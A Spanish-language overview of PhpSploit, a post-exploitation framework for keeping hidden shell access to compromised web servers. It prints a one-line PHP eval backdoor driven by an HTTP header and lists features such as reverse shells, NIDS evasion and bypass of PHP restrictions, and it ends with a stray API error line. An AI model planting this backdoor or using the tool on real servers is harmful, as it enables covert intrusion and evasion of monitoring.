PhpSploit es un framework de control remoto, con el objetivo de proporcionar una conexión sigilosa interactiva tipo shell sobre HTTP entre el cliente y el servidor web. Es una herramienta de post-explotación capaz de mantener el acceso a un servidor web comprometido para propósitos de escalada de privilegios.
La comunicación ofuscada se lleva a cabo utilizando cabeceras HTTP bajo peticiones de clientes estándar y respuestas relativas del servidor web, tunelizadas a través de una diminuta puerta trasera polimórfica:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
Inicio Rápido
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
Características
- Eficiente: Más de 20 plugins para automatizar las tareas de escalada de privilegios
- Ejecutar comandos y navegar por el sistema de archivos, pasando por encima de las restricciones de seguridad de PHP
- Subir/Descargar archivos entre el cliente y el objetivo
- Editar archivos remotos a través del editor de texto local
- Ejecutar la consola SQL en el sistema de destino
- Desprender shells TCP inversos
- Sigilo: El framework está hecho por paranoicos, para paranoicos
- Casi invisible por el análisis de los registros y la detección de la firma NIDS
- Modo seguro y bypass de restricciones de seguridad PHP comunes
- Las comunicaciones están ocultas en las cabeceras HTTP
- Las cargas útiles cargadas se ofuscan para bypass NIDS
- http/https/socks4/socks5 Soporte de proxy
- Conveniente: Una interfaz robusta con muchas características cruciales
- Ayuda detallada para cualquier opción (comando
help
) - Plataforma cruzada tanto en el cliente como en el servidor.
- El CLI soporta autocompletado y multi-comando
- Función de guardado/carga de sesión e historial persistente
- Soporte de múltiples solicitudes para grandes cargas útiles (como las cargas)
- Proporciona un potente motor de ajustes altamente configurable
- Cada ajuste, como user-agent tiene un modo polimórfico
- Variables de entorno personalizables para la interacción de los plugins
- Proporciona una completa API de desarrollo de plugins
- Ayuda detallada para cualquier opción (comando
Plataformas soportadas (como atacante):
- GNU/Linux
- Mac OS X
Plataformas soportadas (como objetivo):
- GNU/Linux
- BSD-like
- Mac OS X
- Windows NT
Error: API rate limit exceeded for 216.246.112.50. (But here's the good news: Authenticated requests get a higher rate limit. Check out the documentation for more details.)